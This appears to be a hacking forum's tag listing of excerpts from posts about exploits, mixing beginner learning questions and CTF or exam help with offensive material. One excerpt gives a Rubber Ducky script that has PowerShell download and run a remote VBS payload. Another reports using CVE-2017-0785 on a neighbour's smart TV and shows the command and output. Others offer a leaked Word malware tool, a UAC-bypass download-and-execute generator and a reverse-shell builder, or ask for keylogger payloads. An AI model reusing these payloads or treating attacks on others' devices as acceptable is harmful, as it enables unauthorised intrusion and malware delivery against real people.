Showing results for tags 'exploit'.


  1. Is it possible to make a rubber ducky open a new cmd window with admin privileges? (without the privileges yourself) (Please put the code in the comments if you can)
  2. Hi guys, I am new to this forum and after looking around nearly everywhere, I am unable to find an answer to this question and hoped you could help. After scanning a website with nikto, the result showed that it was vulnerable to the sips vulnerability and that I could log in as admin without knowing the password. However, after inputting the information in the URL, I was simply redirected to the login page which also contains a captcha. Is there any way I can still exploit the vulnerability such as using Metasploit? Please help
  3. Hi dear friends. I watched this video, but I don't know which payload he was using in this video. So, what do you think about it? Which payload must it be?
  4. I'm looking for a good list of easy to explore CVEs to begin learning about exploit creation.
  5. “Hackers are using booby-trapped Word documents to deliver malware to unsuspecting victims. The malware exploits Windows Object Linking and Embedding (OLE) features, which allow users to link to documents and other objects – in this case, a malicious remote server.” Source: https://www.vadesecure.com/en/word-doc-malware/ This tool was created by the AutoLog team and has since been leaked. Here is the latest version of their OLE Doc Exploit. VirusTotal: https://www.virustotal.com/#/file/1b59c575fc8f3357982a4d917300725065946e31e3dd39f8b00c084aae8f3314/detection Download: https://www.0dayexploi
  6. asmTshell is an exploit pen test application I developed for users using Linux such as Debian, Ubuntu or Kali OS. This tool allows you to build a reverse shell binary file and can be set to run on any OS, be it Windows, Linux or Mac. Once the target Windows/Linux/Mac system runs the shell binary they connect to your server giving you full control of the system's command prompt or shell from your server. It works by utilizing a Linux asm compiler called "nasm". It takes target asm payload and allows you to customize the payload to your des
  7. Hi there, can I use a Teensy 2++ to use the BadUSB exploit like a Rubber Ducky?
  8. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbour's SmartTV...... It gave me this out --->

         sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76
         [!] Pwntools does not support 32-bit Python. Use a 64-bit release.
         [+] Exploit: Done
         00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
         *
         00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│
         00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│
         00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p
  9. Hey all! Greetings! This is my 1st thread. I have just a quick question regarding CTFs or Linux systems. Anyone up for clarifying my doubt? So almost any CTF machine without GRUB or kernel restriction can be easily tweaked to gain root access! If so, I think this can be a legit way to enter the system and perform the rest of the activities. It saves time and doesn't require privilege escalation exploits. If not, please do tell me why this can't be a legit way?
  10. Hello! This is my first post and contribution to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting I thought I'd give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time.

          DELAY 750
          GUI r
          DELAY 1000
          STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}"
          DELAY 500
          ENTER

      Above is a basic rubber ducky script that downloads
  11. I have found an exploit that turns off a phone. I am wondering how I can develop this into something?
  12. Hi all, I'm currently undertaking a project that involves exploiting a Metasploitable 2 machine and a Windows XP machine running SP3, however the findings that I have found are that there are limited resources available when using Metasploit as there seems to be many step by step guides of how to complete an exploit but not enough information regarding troubleshooting. Do you think it would be beneficial to learning to explain more about each step of an exploit in terms of what each command does and if an exploit fails for there to be more information available about why it fails and worka
  13. Hi all, I'm trying to learn the basics of using public exploit code and am running into a "floating point exception" error when I run the compiled code on the target machine. I'm not sure if I am doing something wrong, or if I just need to move on and try another exploit. Your help is greatly appreciated. I am using a 64 bit Kali VM to attack a 32 bit redhat SHRIKE VM. I found an exploit in exploitdb that looks like it should work, "12.c", and have compiled it. The original source code had some simple errors with bad comments and a header file that was in a different location. S
  14. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any Windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges. It's a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process. Stage 1: Stage one is the script that is triggered w
  15. I've been seeking online for a complete tutorial that goes from finding if a computer is vulnerable to an exploit to getting a meterpreter session without the use of trojans. The things that are missing are... 1. the exact procedure of scanning a PC to find if it is vulnerable (and if it is possible a PC outside a local network and how is it possible to scan individual computers that are behind routers?) 2. Importing a new exploit that isn't already inside the metasploit framework. 3. setting a backdoor without the use of the persistence command of the meterpreter. 4. the procedure of the
  16. Hi guys, after the discovery of the Stagefright bug, the researchers at Zimperium posted a Python script for the specific module CVE 1538. I've downloaded it and I've tried to execute this on my Android phone with Lollipop 5.0. Before this, I downloaded the apk of Zimperium to test if my phone is vulnerable. The app shows me, in green, the module CVE-1538 and others... After this, on my Linux PC with Python 2.7.x, I renamed the script to mp4.py to resolve an import error. After this I tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The s
  17. Hello everyone, I was wondering about support regarding security issues/exploits. So like most of you guys I also carry a "smartphone" (Android in this case). What do you guys think the support on a "smartphone" should be? 2 years, 3 years, 5 years? And should it receive security updates even a year after the mentioned years? Also I own an HTC One M7 (Android). Should in this case HTC (and or any other brand) make a security update for a phone regarding the fact that it is 3 years old because of the Stagefright exploit? Thanks in advance and sorry if the reading is wonky
  18. Is there any way for me to inject a payload into the duck that records keystrokes automatically, or at least run a software that I made, a keylogger, automatically upon insertion? If there is can you give the codes? Thank you.
  19. Hi Guys, I figured I'd give this site a try, you guys seem very knowledgeable. I'm on two straight weeks of researching exploits for my Red Hat 2.4.20-8 version and hoping the end result being escalated local privileges from a standard user. Everything keeps pointing back to the following code for that older OS. https://www.exploit-db.com/exploits/22362/ And the Mremap.c code, I've seen remap.c and also mremap.c. Unfortunately I'm not a programmer, yet I've learned about the gcc compiler, versions of gcc and so on in the recent weeks through my trials. My studies end here, it boils down
  20. Howdy Hak5 folks.. Well, I'm expecting some "try harders" and other such encouragement :).. I'm at the very tail end of the CPT exam. If anyone is unsure of it, first part is multi-choice (aced it!).. second is compromising two VMs.. got first in minutes happy to say.. the second one...... here is where I'm losing my hair very quickly. The objective is root password on both VMs... this second one is where I seem to be hitting a dead end, and this is the first reaching out for help attempt. Basically, from what I can gather, this particular VM needs to be compromised via a local exploit be it pri
  21. I created a tutorial on how to get a remote shell on any windows PC in 5 seconds using RubberDucky... enjoy! https://crowdshield.com/blog/2015/pwn-any-windows-pc-in-5-seconds-with-badusb.php
  22. As a pentester, I find myself checking random fields and forms for arbitrary code execution and came across a code execution flaw in the log viewer infusion for the Pineapple. This isn't technically a vulnerability since you need to be logged in as root but it's still unintended functionality resulting in arbitrary code execution.... Regardless of the impact, I enjoy finding things like this so here it is... enjoy! https://www.youtube.com/watch?v=I_i2RhfB-Z8
  23. The website cloner is not working for external viewers to my IP, it works from the host computer but no other one. I am quite new to this and would like a detailed response on how I make it work for external clients visiting the IP. ~Thank you
  24. Hi all, I was reading through xkcd and came across this comic. It seemed like a good idea, and I was wondering if something like that might be possible, and if so, how. I would need specifics, like how to set up connections. Thanks!
  25. Hello, here is the video: How to exploit Heartbleed Vulnerability on Kali Linux. Arabic version of the video: Explanation of scanning for and exploiting the heartbleed vulnerability on large and well-known websites. Share and enjoy :)